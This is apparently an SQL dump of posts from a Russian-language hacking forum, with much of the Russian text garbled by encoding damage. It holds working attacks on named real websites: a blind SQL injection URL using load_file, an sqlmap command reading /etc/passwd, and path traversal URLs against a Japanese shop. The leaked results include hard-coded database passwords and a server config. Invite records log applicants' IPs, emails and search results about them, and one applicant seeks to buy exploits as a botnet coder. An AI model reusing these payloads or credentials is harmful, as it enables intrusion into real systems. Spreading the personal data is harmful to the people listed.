(1745, 1015, 1019, 'BigBear', 34, '', 1408685109, '[QUOTE=w0rm;1019]- antichat \r\n- asechka\r\n- blackseoschool\r\n- cih.ms\r\n- damagelab\r\n- darklife\r\n- dehak.ru\r\n- exploit.in\r\n- hackzone\r\n- kode.cc\r\n- rdot\r\n- maza\r\n- korovka.cc\r\n- milw0rm\r\n\r\n[URL=\"https://www.dropbox.com/s/d6y388k6e9eum1h/%D0%9C%D0%B0%D0%BA.zip\"]download[/URL][/QUOTE]\r\n\r\nÜþöõт úтþ ÿõрõ÷ðûøть?', 1, 0, '', 0, 1, 0, 0, 0),
(1746, 1092, 1141, 'BigBear', 34, '', 1408685141, 'ßõрõ÷ðûõùтõ ÿû÷', 1, 0, '', 0, 1, 0, 0, 0),
(1747, 1092, 1141, 'w0rm', 1, '', 1408699157, 'ÃÂõ ôþûóþ ÿрþöøòõт..\n[URL=\"https://www.sendspace.com/file/2fl21o\"]link[/URL]', 1, 0, '', 0, 1, 0, 0, 0),
(1748, 1554, 0, 'Invite', 2, '{$name}', 1408701894, '[SIZE=\'4\'][COLOR=\'Sienna\']myst3ry[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: vegetauchiw@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 78.193.93.120\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.meetme.com/member/102544185 | http://www.meetme.com/member/102544185 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1749, 1555, 0, 'Invite', 2, '{$name}', 1408701895, '[SIZE=\'4\'][COLOR=\'Sienna\']myst3ry[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: vegetauchiwa@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 78.193.93.120\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.meetme.com/member/102544185 | http://www.meetme.com/member/102544185 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1750, 1556, 0, 'Invite', 2, '{$name}', 1408701897, '[SIZE=\'4\'][COLOR=\'Sienna\']myst3ry[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: vegetauchiwa@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 78.193.93.120\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.meetme.com/member/102544185 | http://www.meetme.com/member/102544185 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1751, 1557, 0, 'Invite', 2, '{$name}', 1408709496, '[SIZE=\'4\'][COLOR=\'Sienna\']owned[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ownedhf@jabb3r.net\n[b]e-mail[/b]: ownedhf@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.203.67.150\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : owned : die_for_it@hotmail.com : : e26d22a6650fe8a1f15054f2563aa4ba\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://owned.com | owned.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1752, 1558, 0, 'Invite', 2, '{$name}', 1408713612, '[SIZE=\'4\'][COLOR=\'Sienna\']DeAd HaCkErZ[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: d99hk1991@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 105.42.158.222\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Linux; Android 4.4.2; SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Mobile Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://dead-hackerz.software.informer.com | dead-hackerz.software.informer.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1753, 1559, 0, 'Invite', 2, '{$name}', 1408718412, '[SIZE=\'4\'][COLOR=\'Sienna\']Bletch[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 315113661\n[b]e-mail[/b]: kdopez@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.215.169.87\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/hashtag/bletch | https://twitter.com/hashtag/bletch \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1754, 1083, 1119, 'Psych0tr1a', 11, '', 1408736414, 'òыûþöø ÿþöðûуùÑÂтð ÿþúþòырÑÂõü òÑÂõ òüõÑÂтõ.', 1, 0, '', 0, 1, 0, 0, 0),
(1755, 1560, 0, 'Psych0tr1a', 11, 'ßþüþóøтõ ýðùтø чøтðûúу фðùûþò ôûѠblind sqli', 1408737328, 'ÑÂðñö ò ýð÷òðýøø ÿþÑÂтð\r\nòøôõû ýð ðчðтõ òрþôõñы ýþ ÷òýþòþ ýðùтø ýõ ÑÂüþó', 1, 0, '', 0, 1, 0, 0, 0),
(1756, 1067, 1086, 'Psych0tr1a', 11, '', 1408738759, '[code]http://www.thaimail.com/chkuser.php?uid=qwerty\'+and+length(load_file(\'/usr/local/www/apache22/data/\'))!=0+--+&password=concac[/code]\n\nòþт ÿþúð чтþ уôðûþÑÂÑŒ ÿþôþñрðть\núðú òøôýþ - чøтðютÑÂѠýõтþûьúþ фðùûы ýþ ø ôøры.\nхþрþшую чøтðûúу ñы ôûѠñûðõýôð - ÷ðûøÃȄÂÑŒ ñы ôðòýþ ôð ø ÑÂôðüÿøûø ñы ýðхрõý òÑÂõх ю÷õрþò. \nýð óûðòýþù òøÑÂøт ÑÂþþñщõýøõ чтþ 1 ÑÂõýтÑÂñрѠÿрþõúт ÷ðúрыòðõтÑÂÑÂ(( þÑÂтðûþÑÂÑŒ òрõüõýø ýõüýþóþ.', 1, 0, '', 0, 1, 0, 0, 0),
(1757, 1561, 0, 'Invite', 2, '{$name}', 1408756163, '[SIZE=\'4\'][COLOR=\'Sienna\']Jimbar[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: jimbar@jabber.org\n[b]e-mail[/b]: jimbar@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 162.218.67.147\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/JimsBarPdc | https://twitter.com/JimsBarPdc \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1758, 1067, 1756, 'kx00', 6, '', 1408766487, '[quote=psych0tr1a;1756][code]http://www.thaimail.com/chkuser.php?uid=qwerty\'+and+length(load_file(\'/usr/local/www/apache22/data/\'))!=0+--+&password=concac[/code]\r\n\r\nòþт ÿþúð чтþ уôðûþÑÂÑŒ ÿþôþñрðть\r\núðú òøôýþ - чøтðютÑÂѠýõтþûьúþ фðùûы ýþ ø ôøры.\r\nхþрþшую чøтðûúу ñы ôûѠñûðõýôð - ÷ðûøÃȄÂÑŒ ñы ôðòýþ ôð ø ÑÂôðüÿøûø ñы ýðхрõý òÑÂõх ю÷õрþò. \r\nýð óûðòýþù òøÑÂøт ÑÂþþñщõýøõ чтþ 1 ÑÂõýтÑÂñрѠÿрþõúт ÷ðúрыòðõтÑÂÑÂ(( þÑÂтðûþÑÂÑŒ òрõüõýø ýõüýþóþ.[/quote]\r\n\r\nÑÂüыÑÂûð ýõт øÑÂúðть чøтðûúу. ñð÷ð ýðхþôøтьÑÂѠ÷ð nat\'þü, ôðöõ õÑÂûø ÷ðûьõüÑÂÑÂ, üы ýõ ÑÂüþöõü ÿþûучøть ôþÑÂтуÿ ú шõûûу. Lfi, òðрøðýт тðú ÑÂõñõ, øôõт рþтðцøѠûþóþò(ÑÂöðтøõ). òðрøðýт ѠÿрþцõÑÂÑÂðüø þÑÂтðõтÑÂÑÂ, ýþ Ѡõóþ úрутøû ø ø÷-÷ð úðúþù тþ хõрýø ñрþÑÂøû. ýõ ÿþüýю ÿþчõüу.', 1, 1, '', 0, 1, 0, 0, 0),
(1759, 1562, 0, 'Invite', 2, '{$name}', 1408772622, '[SIZE=\'4\'][COLOR=\'Sienna\']nofade[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: nofade13@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 90.8.224.31\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1760, 1563, 0, 'Invite', 2, '{$name}', 1408772650, '[SIZE=\'4\'][COLOR=\'Sienna\']dr0id[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: skype formatmezzz\n[b]e-mail[/b]: gmleaked@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 173.55.160.38\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://dr0id.ru | dr0id.ru \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1761, 1564, 0, 'Invite', 2, '{$name}', 1408791716, '[SIZE=\'4\'][COLOR=\'Sienna\']fri3ndlyfir3[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: frindlyfire2013@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\ni have little programing experience in VB.NET.\r\nand also Security adviser in Software House.\r\n\r\n\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 103.246.114.79\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140610 Firefox/24.0 Iceweasel/24.6.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://fri3ndlyfir3.znih.com | fri3ndlyfir3.znih.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1762, 1560, 1755, '123', 41, '', 1408799602, 'sqlmap ýõ?', 1, 0, '', 0, 1, 0, 0, 0),
(1763, 1560, 1755, 'w0rm', 1, '', 1408802161, 'sqlmap -u \"http://\" --file-read=\"/etc/passwd\"', 1, 0, '', 0, 1, 0, 0, 0),
(1765, 1565, 0, 'Invite', 2, '{$name}', 1408808934, '[SIZE=\'4\'][COLOR=\'Sienna\']Emerakul[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: Emerakul@expliot.im\n[b]e-mail[/b]: Emerakul@cock.li\n[b]Info[/b]: Hello all,\r\n\r\nMy name is Emerakul. I am interested in buying exploits/exploitable websites. I want to check this place out soon.\r\n\r\nA little bit about myself, I am Emerakul. I am a botnet coder, and I hail from some far corners of the earth.\r\n\r\nRegards,\r\nEmerakul\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 67.177.97.90\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/hashtag/emrakul | https://twitter.com/hashtag/emrakul \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1766, 1566, 0, 'Invite', 2, '{$name}', 1408811106, '[SIZE=\'4\'][COLOR=\'Sienna\']rus_64[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: rukus84@mail.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 196.217.168.9\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.match.com/profile/showprofile.aspx/?...rus64... | http://www.match.com/profile/showprofile.aspx/?...rus64... \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1767, 1567, 0, 'Invite', 2, '{$name}', 1408811108, '[SIZE=\'4\'][COLOR=\'Sienna\']rus_64[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: rukus84@mail.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 196.217.168.9\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.match.com/profile/showprofile.aspx/?...rus64... | http://www.match.com/profile/showprofile.aspx/?...rus64... \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1768, 1083, 1119, 'BigBear', 34, '', 1408813043, '[url]http://www.toranoana.jp/cgi-bin/R2/d_search.cgi?item_kind=0402&mak=S.C.X&img=&stk=1&makAg=1&p2=40&p3=5730303934303738&p1=../../../../../../../../../../etc/passwd%00.jpg[/url]\n\n[url]http://www.toranoana.jp/cgi-bin/R2/d_search.cgi?item_kind=0402&mak=S.C.X&img=&stk=1&makAg=1&p2=40&p3=5730303934303738&p1=../../../../../../../../../../web/cgi-bin/login.cgi%00.jpg[/url]\n\nrequire \"/web/plib/R2/libcommon.pl\";\nrequire \"/web/plib/libenv.pl\";\nrequire \"/web/plib/libhtml.pl\";\nrequire \"/web/plib/R2/libcookie.pl\";\nrequire \"/web/plib/R2/libdatabase.pl\";\nrequire \"/web/plib/sql_regist.pl\";\nrequire \"/web/plib/libutil.pl\";\nrequire \"/web/plib/jcode.pl\";\nrequire \"/web/plib/librate.pl\";\nrequire \"/web/cgi-bin/get_hosp.pl\";\nrequire \"/web/cgi-bin/get_cgi_frame_templ.pl\";\n\n# $Id: libdatabase.pl 60 2005-07-07 11:58:38Z funa $ #\n\nmy $FMOS_IP=\"FMOS\";\nmy $FMOS_ID=\"ectora\";\nmy $FMOS_PW=\"ec2004\";\n\nmy $IMOS_IP=\"IMOS\";\nmy $IMOS_ID=\"ectora\";\nmy $IMOS_PW=\"ec2004\";\n\nmy $FMOSR_IP=\"FMOSR\";\nmy $FMOSR_ID=\"ectora\";\nmy $FMOSR_PW=\"ec2004\";', 1, 0, '', 0, 1, 0, 0, 0),
(1769, 1083, 1768, 'ropertus', 33, '', 1408832714, '/opt/apache2/conf/vhost.conf\r\n[code]\r\n #\r\n# Use name-based virtual hosting.\r\n#\r\n\r\nNameVirtualHost *:80\r\n\r\n# Default Setting\r\n\r\n ServerAdmin webmaster@toranoana.co.jp\r\n DocumentRoot \"/web/default/htdocs\"\r\n ServerName _default_\r\n ScriptAlias /cgi-bin/ \"/web/default/cgi-bin/\"\r\n \r\n AllowOverride None\r\n Options None\r\n Order allow,deny\r\n Allow from all\r\n \r\n \r\n Options +Includes\r\n Options +ExecCGI\r\n AllowOverride All\r\n Order allow,deny\r\n Allow from all\r\n \r\n \r\n order deny,allow\r\n deny from all\r\n \r\n ErrorLog \"|/opt/apache2/bin/rotatelogs /var/toralog/default/error-%y-%m-%d.log 86400 540\"\r\n CustomLog \"|/opt/apache2/bin/rotatelogs /var/toralog/default/access-%y-%m-%d.log 86400 540\" combined\r\n \r\n\r\n#-----------------------------------------------------------\r\n# www.toranoana.jp\r\n#-----------------------------------------------------------\r\n\r\n ServerAdmin webmaster@toranoana.co.jp\r\n DocumentRoot \"/web/htdocs\"\r\n ServerName www.toranoana.jp\r\n ServerAlias tra-w7s.toranoana.jp\r\n ErrorDocument 401 /error/401.html\r\n ErrorDocument 403 /error/403.html\r\n ErrorDocument 404 /error/404.html\r\n ErrorDocument 500 /error/500.html\r\n ScriptAlias /cgi-bin/ 